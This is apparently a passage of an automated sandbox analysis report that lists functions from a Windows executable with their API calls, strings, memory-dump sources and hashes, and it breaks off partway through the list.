                                                                                                                                                                        • Instruction ID: 2cb79aa0b10172f30405515c3ccd8c412a23668eceb3c7f1f7282354e7834478
                                                                                                                                                                        • Opcode Fuzzy Hash: 44f5066f7f2bfb3dd0dfb45878ce3861dbe45c1fc0ff59f6e037fa46542ca18f
                                                                                                                                                                        • Instruction Fuzzy Hash: BF213071618300AFD300DF35DC49A6B7BE9EF8C714F00865AF895D7292E730D9898B56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF23D0 Relevance: 9.4, APIs: 6, Instructions: 354fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000,1FC3D414,?,?,00000002,?,?,?,?,?,?,00000000,00DEF282), ref: 00CF2427
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002), ref: 00CF26B9
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002), ref: 00CF2763
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,?,00000000,00DEF282,000000FF,?,00CF12BA,00000010), ref: 00CF2436
                                                                                                                                                                          • Part of subcall function 00CCFDA0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,1FC3D414,?,00000000), ref: 00CCFDEB
                                                                                                                                                                          • Part of subcall function 00CCFDA0: GetLastError.KERNEL32(?,00000000), ref: 00CCFDF5
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000008,80070057,00000000,?,00000002), ref: 00CF24F8
                                                                                                                                                                        • ReadFile.KERNEL32(?,1FC3D414,00000000,00000000,00000000,00000001,?,00000002), ref: 00CF2575
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3903527278-0
                                                                                                                                                                        • Opcode ID: 65f1c0e3efeeb595b4c86c7fc48446835c8ef9ce5bbc42b1bfb7abadcad1934d
                                                                                                                                                                        • Instruction ID: 05b52cc3d560e11a515f63edd47c5264e68963ef8d86745c4b29ec6c86ebbdaa
                                                                                                                                                                        • Opcode Fuzzy Hash: 65f1c0e3efeeb595b4c86c7fc48446835c8ef9ce5bbc42b1bfb7abadcad1934d
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD19171D00209DFDB00DFA8C885BADFBB5FF44314F148269E925AB392EB749A05CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD7070 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 196COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(80004005,00DEFE45,1FC3D414,?,?,00000000,?,?,00000000,00DEFE45,000000FF,?,80004005,1FC3D414,?), ref: 00CD70D5
                                                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,00000000,?,?,00000000,00DEFE45,000000FF,?,80004005,1FC3D414,?), ref: 00CD7123
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInfoVersion$Size
                                                                                                                                                                        • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                                                                                                                        • API String ID: 2104008232-2149928195
                                                                                                                                                                        • Opcode ID: ab4fdfeffd685e32d4e9d8fbdb14683f2b8824b31af7bdec01840a92f0502ace
                                                                                                                                                                        • Instruction ID: 8fb60ee6f7cd860720d9f2f944ac429fae0dcd7fbe8d5986d8f5d029bd1f6bf3
                                                                                                                                                                        • Opcode Fuzzy Hash: ab4fdfeffd685e32d4e9d8fbdb14683f2b8824b31af7bdec01840a92f0502ace
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C619071905149EFCB14DFA9C849ABEB7F8FF05314F14429AE925A7291EB309E04CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE64F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,1FC3D414,?,00000010,?,00CE9EF0,?), ref: 00CE6556
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 00CE659F
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,1FC3D414,?,?,00000000,00000078,?), ref: 00CE65E1
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CE665A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 2405668454-878583566
                                                                                                                                                                        • Opcode ID: 99b29087e95487a2c821f545a8b2f0458d54e1f32e63ca920df7a54093367c3c
                                                                                                                                                                        • Instruction ID: a9c78896281710ee389847541a4e4bae041b24aa0ffef7148afcd02ca7517be6
                                                                                                                                                                        • Opcode Fuzzy Hash: 99b29087e95487a2c821f545a8b2f0458d54e1f32e63ca920df7a54093367c3c
                                                                                                                                                                        • Instruction Fuzzy Hash: 9851DF70911649AFDB10CBA9CC48BEEFBB8EF54324F148259F421AB2D1D7709E04CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD6F60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CD6B40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,1FC3D414,00000000,00000000,?), ref: 00CD6B95
                                                                                                                                                                          • Part of subcall function 00CD6B40: GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?), ref: 00CD6C5C
                                                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,1FC3D414,00000000,?,?,00000000,00DE9775,000000FF,Shlwapi.dll,00CD6F16,?,?,?), ref: 00CD6FAD
                                                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 00CD6FD9
                                                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00CD701E
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00CD7031
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$InfoVersion$DeleteErrorFolderLastNamePathSizeTemp
                                                                                                                                                                        • String ID: Shlwapi.dll
                                                                                                                                                                        • API String ID: 1346648681-1687636465
                                                                                                                                                                        • Opcode ID: 171e544dfb749d6f031e1de46bf7c6984984bdf6320cd09942a0716ae2fcf23c
                                                                                                                                                                        • Instruction ID: 556699f5f06a71c5b9a127bf9cce8155b6ec77ecad7171edc4ea7a1f473c61f1
                                                                                                                                                                        • Opcode Fuzzy Hash: 171e544dfb749d6f031e1de46bf7c6984984bdf6320cd09942a0716ae2fcf23c
                                                                                                                                                                        • Instruction Fuzzy Hash: 16313071905209AFDB10DFA5D944BAFBBB8EF08350F14425BE915A3290EB35AA44CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCFF30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(ComCtl32.dll,1FC3D414,?,00000000,00000000), ref: 00CCFF6E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCFF91
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00CD000F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                                                                        • API String ID: 145871493-764666640
                                                                                                                                                                        • Opcode ID: d2d33854e3ca68901f073d9f2bc4d6763dc2a427cfa9caeba2c81f59381e6f03
                                                                                                                                                                        • Instruction ID: 7784ea463d6cc1b50d278c91c804b6691c318769561d523b3c4758974e9cd12a
                                                                                                                                                                        • Opcode Fuzzy Hash: d2d33854e3ca68901f073d9f2bc4d6763dc2a427cfa9caeba2c81f59381e6f03
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F318471900255AFDB108F95DC44BAFBFF8EB49750F14412EF915B3281D7759A04CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCD7E0 Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00CCD801
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000), ref: 00CCD847
                                                                                                                                                                        • TranslateMessage.USER32(00000000), ref: 00CCD852
                                                                                                                                                                        • DispatchMessageW.USER32(00000000), ref: 00CCD859
                                                                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 00CCD86B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4084795276-0
                                                                                                                                                                        • Opcode ID: ebb8d6badbdf55ef17337af13861f67dd41ad1cd25dbac7a92c7bffc51fd5000
                                                                                                                                                                        • Instruction ID: d19ad1977fcdf23115a7f14f08dfd3fa2bb0b261252a5db6e2d212733f46313d
                                                                                                                                                                        • Opcode Fuzzy Hash: ebb8d6badbdf55ef17337af13861f67dd41ad1cd25dbac7a92c7bffc51fd5000
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F1136716483056AE610CB51DC81FA6B3DCEB89B74F40023BFA10E21C0E630E9498B61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CEEEE0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PathIsUNCW.SHLWAPI(?,1FC3D414,?,00000010,?), ref: 00CEF1AA
                                                                                                                                                                          • Part of subcall function 00CCE790: GetCurrentProcess.KERNEL32 ref: 00CCE7D8
                                                                                                                                                                          • Part of subcall function 00CCE790: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CCE7E5
                                                                                                                                                                          • Part of subcall function 00CCE790: GetLastError.KERNEL32 ref: 00CCE7EF
                                                                                                                                                                          • Part of subcall function 00CCE790: FindCloseChangeNotification.KERNEL32(00000000), ref: 00CCE8D0
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$FindInit_thread_footer$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
                                                                                                                                                                        • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                                                                                                                                        • API String ID: 2914359614-3538578949
                                                                                                                                                                        • Opcode ID: 79a9acdd79ae36e50145d83fa2aac2fb3c36899eb440befb0807b1bf5312aa4b
                                                                                                                                                                        • Instruction ID: 21823657539924bea342d18d3d9e1ef4fe738687db206cd284ea42ee6d43a484
                                                                                                                                                                        • Opcode Fuzzy Hash: 79a9acdd79ae36e50145d83fa2aac2fb3c36899eb440befb0807b1bf5312aa4b
                                                                                                                                                                        • Instruction Fuzzy Hash: EBC1D4309006499FDB10DFADC884BAEF7F4AF45314F1482ADE925AB292DB709E01CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CE6980 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CE67F0: GetTickCount.KERNEL32 ref: 00CE6874
                                                                                                                                                                          • Part of subcall function 00CE67F0: __Xtime_get_ticks.LIBCPMT ref: 00CE687C
                                                                                                                                                                          • Part of subcall function 00CE67F0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CE68C6
                                                                                                                                                                          • Part of subcall function 00D0AC30: GetUserNameW.ADVAPI32(?,?), ref: 00D0ACC5
                                                                                                                                                                          • Part of subcall function 00D0AC30: GetLastError.KERNEL32 ref: 00D0ACCB
                                                                                                                                                                          • Part of subcall function 00D0AC30: GetUserNameW.ADVAPI32(?,?), ref: 00D0AD13
                                                                                                                                                                          • Part of subcall function 00D0AC30: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 00D0AD49
                                                                                                                                                                          • Part of subcall function 00D0AC30: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 00D0AD93
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CE6AB1
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,1FC3D414), ref: 00CE6CA8
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00CE6CAF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnvironmentNameProcessUserVariable$CountCurrentErrorInit_thread_footerLastOpenTickTokenUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                        • String ID: \/:*?"<>|
                                                                                                                                                                        • API String ID: 1521599615-3830478854
                                                                                                                                                                        • Opcode ID: eae172d4179cb625303db18c7343c1367e0c27dd670539e222f390e0a45af76e
                                                                                                                                                                        • Instruction ID: 555f109c32129d4cea67165f5d3348a6c1d34cc169b1d0bb72ac037092b07031
                                                                                                                                                                        • Opcode Fuzzy Hash: eae172d4179cb625303db18c7343c1367e0c27dd670539e222f390e0a45af76e
                                                                                                                                                                        • Instruction Fuzzy Hash: D6B1DC71D00248CFDB14DFA9C8457EEBBB4EF14304F24826DE415AB292EB746E49CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D1F2E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00D20324,40000000,00000001,00000000,00000002,00000080,00000000,1FC3D414,?,00000001), ref: 00D1F342
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,0000C800,0000C800,0000C800,00000000,?,0000C800), ref: 00D1F3D8
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,0000C800), ref: 00D1F44C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 1065093856-878583566
                                                                                                                                                                        • Opcode ID: 171c13842049a42c24222381b06bccbc19cf1c58314871e04760780f0a995b23
                                                                                                                                                                        • Instruction ID: 2332c77539337e35b0934f44d174ecb829261da64d399e9b6dcf1e5c61d09f77
                                                                                                                                                                        • Opcode Fuzzy Hash: 171c13842049a42c24222381b06bccbc19cf1c58314871e04760780f0a995b23
                                                                                                                                                                        • Instruction Fuzzy Hash: 71518E71A10218AFDF10DFA9ED45BEEBBB9FF48310F144269F810B7290DB7599448BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD4B10 Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadStringW.USER32(?,00000000,?,00000100), ref: 00CD4C0C
                                                                                                                                                                        • LoadStringW.USER32(?,00000000,?,00000001), ref: 00CD4CA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                        • Opcode ID: 1575b6a88fccef9ab4a7fbb8eb912d2db065cdee76a77cb574e1e924577a6808
                                                                                                                                                                        • Instruction ID: d37246da76a2afa81840586d3670c69d42371f810b70c9d1b6b006f6dd5bcc02
                                                                                                                                                                        • Opcode Fuzzy Hash: 1575b6a88fccef9ab4a7fbb8eb912d2db065cdee76a77cb574e1e924577a6808
                                                                                                                                                                        • Instruction Fuzzy Hash: C3B17E71D11208AFDB04DFA8D945BEDBBB5FF48300F10822AEA15A7390EB746A45CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCCB90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 345COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • PathIsUNCW.SHLWAPI(?,?), ref: 00CCCD26
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
